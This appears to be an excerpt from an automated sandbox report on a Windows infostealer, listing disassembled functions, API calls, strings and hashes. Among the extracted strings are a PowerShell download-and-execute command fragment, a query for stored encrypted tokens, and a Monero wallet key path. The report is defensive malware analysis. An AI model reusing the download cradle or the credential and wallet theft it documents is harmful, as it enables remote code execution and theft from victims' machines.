                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: ead67ac665bb2a6ad27dae0bacb3e5115dee6693a7bbe285dad3976171df4033
                    • Instruction ID: bf1916f3188128aa584078abd54bd5d727d6260dbce07087cc702724ecad300f
                    • Opcode Fuzzy Hash: ead67ac665bb2a6ad27dae0bacb3e5115dee6693a7bbe285dad3976171df4033
                    • Instruction Fuzzy Hash: E3B164B19101049BEB04FBA1CC96EEE7339AF14304F50496FF50662191EF7C6A59CBBA
                    Function 00486770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 8f5910ae322d992617e449d3d4ea6967f6952df243d3920ff64f31f15f1e7ec4
                    • Instruction ID: 91f6988b59c1b924a161d96389ba3626df4b964ed1263351ccbb517cee3ec545
                    • Opcode Fuzzy Hash: 8f5910ae322d992617e449d3d4ea6967f6952df243d3920ff64f31f15f1e7ec4
                    • Instruction Fuzzy Hash: 3AF05E74908249FFE384AFE0E90972C7B71FB04703F0402ADF60986290DA764B919BD6
                    Function 00474FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00474FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00474FD1
                    • InternetOpenA.WININET(00490DDF,00000000,00000000,00000000,00000000), ref: 00474FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00475011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00475041
                    • InternetCloseHandle.WININET(?), ref: 004750B9
                    • InternetCloseHandle.WININET(?), ref: 004750C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: cbebec856c6ac5910dbd3ff9b71651d0695859041450f3900cddc68b69c2c9cf
                    • Instruction ID: 893dffae372fd35bb64f4ac6a07337d94abbb8ea5ad644568fc4406c5370838e
                    • Opcode Fuzzy Hash: cbebec856c6ac5910dbd3ff9b71651d0695859041450f3900cddc68b69c2c9cf
                    • Instruction Fuzzy Hash: D5310CF4A00218ABDB20DF54DC85BDDB7B5EB48704F1081D9E709A7280DBB46AC58F99
                    Function 004883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
                    • wsprintfA.USER32 ref: 00488459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0048847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00488499
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,0123DF08,00000000,000F003F,?,00000400), ref: 004884EC
                    • lstrlen.KERNEL32(?), ref: 00488501
                    • RegQueryValueExA.ADVAPI32(00000000,0123DE48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00490B34), ref: 00488599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00488608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 1d52065d468d222c957083567478b59cd4314c2bfaceac6b4d103622a158270a
                    • Instruction ID: 6d1365e725eee16cb296ad9eb85e26d83ed815e76535cda21552f88502ac1d58
                    • Opcode Fuzzy Hash: 1d52065d468d222c957083567478b59cd4314c2bfaceac6b4d103622a158270a
                    • Instruction Fuzzy Hash: 49210AB1900218ABDB24DB54DC85FE9B3B9FB48700F40C699E609A6140DF75AAC5CFE4
                    Function 00487690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004876A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 004876AB
                    • RegOpenKeyExA.ADVAPI32(80000002,0122C508,00000000,00020119,00000000), ref: 004876DD
                    • RegQueryValueExA.ADVAPI32(00000000,0123DF98,00000000,00000000,?,000000FF), ref: 004876FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00487708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 442ed9b9e9e67b0b570d7976dffb15ac1a32fa098341c7335b30754d16b6c4ac
                    • Instruction ID: d2e7bce008f2e405159aa3bde3488c491959fb1cdaa35e5bb475f6e284342a14
                    • Opcode Fuzzy Hash: 442ed9b9e9e67b0b570d7976dffb15ac1a32fa098341c7335b30754d16b6c4ac
                    • Instruction Fuzzy Hash: D101A2F8A04304BFDB00EBE0DD59F6EB7B9EB48700F104655FA05D7291EA74A980CB55
                    Function 00487720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0048773B
                    • RegOpenKeyExA.ADVAPI32(80000002,0122C508,00000000,00020119,004876B9), ref: 0048775B
                    • RegQueryValueExA.ADVAPI32(004876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0048777A
                    • RegCloseKey.ADVAPI32(004876B9), ref: 00487784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: c4a599c38dcaeef2a59b3c79f24eec2f0fb8db02b6db598fbac6f117439dcbc0
                    • Instruction ID: 3b8668429cc0a394c23ff978b59a21bc33056484ef53db96f1a160ee800f1571
                    • Opcode Fuzzy Hash: c4a599c38dcaeef2a59b3c79f24eec2f0fb8db02b6db598fbac6f117439dcbc0
                    • Instruction Fuzzy Hash: 390117F9A40308BFDB00DFE4DC49FAEB7B9EB44705F104659FA05A7281DA745540CB55
                    Function 004892E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(:H,80000000,00000003,00000000,00000003,00000080,00000000,?,00483AEE,?), ref: 004892FC
                    • GetFileSizeEx.KERNEL32(000000FF,:H), ref: 00489319
                    • CloseHandle.KERNEL32(000000FF), ref: 00489327
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :H$:H
                    • API String ID: 1378416451-2582992418
                    • Opcode ID: bda397af67583db6e3de5d6453b002127e45ac22a63408c4a056109f8d1084e1
                    • Instruction ID: 05ad29bb4ad390bdae663519d14aaaa6481c414137e95920f806c2d03df9155d
                    • Opcode Fuzzy Hash: bda397af67583db6e3de5d6453b002127e45ac22a63408c4a056109f8d1084e1
                    • Instruction Fuzzy Hash: D3F03179E44204BBDB10DFF4DC45B9E77B9AB48710F108654B951A72C0DA749A418B45
                    Function 004799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                    • LocalFree.KERNEL32(0047148F), ref: 00479A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 66008b071b6194975339f42e17d5fecb39c2fb2b4cd9b68048b0d0bdf50fa993
                    • Instruction ID: e650c839876b6a824f6c435b2c9bcfaa3539d902a7f2b62aedde137387db8f00
                    • Opcode Fuzzy Hash: 66008b071b6194975339f42e17d5fecb39c2fb2b4cd9b68048b0d0bdf50fa993
                    • Instruction Fuzzy Hash: 5731F3B4A00209EFDB14DFA4C885BEE77B9FF48310F108159E905A7390D778AA81CFA5
                    Function 00484780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(?,0123E370), ref: 004847DB
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00484801
                    • lstrcat.KERNEL32(?,?), ref: 00484820
                    • lstrcat.KERNEL32(?,?), ref: 00484834
                    • lstrcat.KERNEL32(?,0122B7C8), ref: 00484847
                    • lstrcat.KERNEL32(?,?), ref: 0048485B
                    • lstrcat.KERNEL32(?,0123D5E0), ref: 0048486F
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 00488D90: GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F
                      • Part of subcall function 00484570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00484580
                      • Part of subcall function 00484570: RtlAllocateHeap.NTDLL(00000000), ref: 00484587
                      • Part of subcall function 00484570: wsprintfA.USER32 ref: 004845A6
                      • Part of subcall function 00484570: FindFirstFileA.KERNEL32(?,?), ref: 004845BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 71f39181dd346d1576259280032853e68151b54b0bf547d75706677907b8bdb3
                    • Instruction ID: 88c901e6a310bb55aa2c28cd222cc140c3c08222040f05a88a23c4d49be9ab44
                    • Opcode Fuzzy Hash: 71f39181dd346d1576259280032853e68151b54b0bf547d75706677907b8bdb3
                    • Instruction Fuzzy Hash: 343162F290020867CB15FBB0DC85EED737DAB58704F40498EB31996091EEB897C9CB99
                    Function 00482C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00482D85
                    Strings
                    • <, xrefs: 00482D39
                    • ')", xrefs: 00482CB3
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00482CC4
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00482D04
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: c418c491b281641586fed287784b349a63fe2ee70b7dfe1dea5b3d57aefd0a3b
                    • Instruction ID: c4c91a9559a0f6b8f68e0d410487a6368f543847ff02eb1baea553f9bb7ae2cf
